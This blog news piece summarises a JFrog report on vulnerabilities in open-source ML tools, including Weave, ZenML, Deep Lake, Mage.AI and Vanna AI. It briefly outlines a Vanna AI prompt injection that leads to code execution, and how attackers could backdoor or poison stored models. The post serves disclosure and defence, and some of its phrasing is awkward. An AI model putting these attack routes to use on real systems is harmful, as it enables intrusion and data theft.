December 22, 2024

Open source machine learning systems are highly vulnerable to security threats

Blog

MLflow identified as the most vulnerable open source ML platform
Directory traversal flaw allows unauthorized file access in Weave
ZenML Cloud’s access control issue leads to privilege escalation risk

A recent analysis of the security landscape of machine learning (ML) frameworks shows that ML software is susceptible to more security vulnerabilities than more mature categories such as DevOps or web servers.

The increasing popularity of machine learning across industries highlights the urgent need to protect machine learning systems, as vulnerabilities can lead to unauthorized access, data exfiltration, and operational compromise.

this Report JFrog claims that there has been an increase in critical vulnerabilities in ML projects such as MLflow. Over the past few months, JFrog has discovered 22 vulnerabilities in 15 open source ML projects. Among these vulnerabilities, two categories of vulnerabilities stand out the most: threats targeting server-side components and privilege escalation risks within machine learning frameworks.

Critical vulnerabilities in machine learning frameworks

The vulnerabilities discovered by JFrog affect key components frequently used in ML workflows, which could allow attackers to gain unauthorized access to sensitive files or escalate the vulnerability of ML environments by leveraging tools that ML practitioners trust for their flexibility. permissions.

One of the prominent vulnerabilities involves Weave, a popular toolkit from Weights & Biases (W&B) that helps track and visualize ML model metrics. The WANDB Weave directory traversal vulnerability (CVE-2024-7340) allows low-privileged users to access arbitrary files across file systems.

This flaw is caused by improper input validation when handling file paths and could allow an attacker to view sensitive files that may contain administrative API keys or other privileged information. This vulnerability could lead to privilege escalation, giving an attacker unauthorized access to resources and compromising the security of the entire machine learning pipeline.

ZenML, the MLOps pipeline management tool, is also affected by a critical vulnerability that compromises its access control system. This flaw could allow an attacker with minimal access privileges to escalate their privileges in ZenML Cloud, a hosted deployment of ZenML, and gain access to restricted information, including confidential secrets or model files.

Access control issues in ZenML put the system at significant risk, as escalated privileges could allow attackers to manipulate ML pipelines, tamper with model data, or access sensitive operational data, potentially impacting production environments that rely on these pipelines.

Another critical vulnerability called Deep Lake Command Injection (CVE-2024-6507) has been discovered in the Deep Lake database, a data storage solution optimized for AI Application. This vulnerability allows an attacker to execute arbitrary commands by leveraging the way Deep Lake handles the import of external data sets.

Due to improper command sanitization, an attacker could achieve remote code execution, compromising the security of the database and any connected applications.

A noteworthy vulnerability was also discovered in Vanna AI, a tool designed for natural language SQL query generation and visualization. Vanna.AI prompt injection (CVE-2024-5565) allows an attacker to inject malicious code into SQL prompts, which are then processed by the tool. The vulnerability could lead to remote code execution, allowing a malicious attacker to leverage Vanna AI’s SQL-to-graph visualization capabilities to manipulate visualizations, perform SQL injection, or steal data.

Mage.AI, an MLOps tool for managing data pipelines, has been found to have multiple vulnerabilities, including unauthorized shell access, arbitrary file leaks, and weak path traversal checks.

These issues allow attackers to control data pipelines, expose sensitive configurations, and even execute malicious commands. The combination of these vulnerabilities poses a high risk of privilege escalation and breach of data integrity, compromising the security and stability of machine learning pipelines.

By gaining administrative access to a machine learning database or registry, an attacker can embed malicious code in a model, causing a backdoor to be launched when the model is loaded. When models are used by different teams and CI/CD pipelines, this can impact downstream processes. Attackers can also steal sensitive data or conduct model poisoning attacks to reduce model performance or manipulate output.

JFrog’s findings highlight operational gaps in MLOps security. Many organizations lack strong integration of AI/ML security practices with broader cybersecurity strategies, leaving potential blind spots. As machine learning and artificial intelligence continue to drive significant advancements in the industry, protecting the frameworks, datasets and models that drive these innovations is critical.

Open source machine learning systems are highly vulnerable to security threats

Leave a Reply Cancel reply